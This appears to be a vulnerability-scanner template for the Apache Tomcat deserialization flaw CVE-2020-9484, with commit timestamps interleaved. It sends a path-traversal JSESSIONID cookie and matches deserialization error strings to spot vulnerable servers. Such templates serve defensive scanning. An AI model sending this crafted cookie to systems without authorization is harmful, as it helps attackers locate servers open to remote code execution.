2021-01-02 04:56:15 +00:00
id : CVE-2020-9484
2020-07-03 05:39:02 +00:00
info :
name : Apache Tomcat RCE by deserialization
author : dwisiswant0
severity : high
2020-08-25 22:52:00 +00:00
description : Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
2021-02-05 19:44:41 +00:00
tags : cve,cve2020,apache
2021-03-15 17:23:47 +00:00
reference :
- http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
2020-07-03 05:39:02 +00:00
requests :
- method : GET
headers :
Cookie : "JSESSIONID=../../../../../usr/local/tomcat/groovy"
path :
- "{{BaseURL}}/index.jsp"
matchers-condition : and
matchers :
- type : status
status :
- 500
- type : word
words :
- "Exception"
- "ObjectInputStream"
- "PersistentManagerBase"
condition : and
2020-08-25 22:52:00 +00:00
part : body
